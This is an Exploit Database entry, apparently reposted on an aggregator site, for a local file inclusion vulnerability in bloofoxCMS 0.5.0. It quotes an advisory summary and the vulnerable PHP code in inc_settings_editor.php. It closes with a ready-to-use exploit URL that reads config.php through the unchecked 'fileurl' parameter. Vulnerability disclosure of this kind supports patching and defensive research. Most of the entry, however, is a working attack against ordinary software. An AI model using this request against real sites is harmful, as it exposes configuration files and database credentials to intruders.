BloofoxCMS 0.5.0 – ‘fileurl’ Local File Inclusion

• Exploit Database
• 19 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2014-01-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39032/

• source: https://www.securityfocus.com/bid/65019/info
   
  bloofoxCMS is prone to the following security vulnerabilities:
   
  1. Multiple SQL-injection vulnerabilities
  2. Multiple cross-site request forgery vulnerabilities
  3. A local file-include vulnerability
   
  Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
   
  bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected.
   
  VULNERABILITY
  ##############
  /admin/include/inc_settings_editor.php (line 56-69)
  
  // show file
  if(isset($_POST["fileurl"])) {
  $fileurl = $_POST["fileurl"];
  }
  if(isset($_GET["fileurl"])) {
  $fileurl = "../".$_GET["fileurl"];
  }
  
  if(file_exists($fileurl)) {
  $filelength = filesize($fileurl);
  $readfile = fopen($fileurl,"r");
  $file = fread($readfile,$filelength);
  fclose($readfile);
  }
  
  
  
  #########
  EXPLOIT
  #########
  
  http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php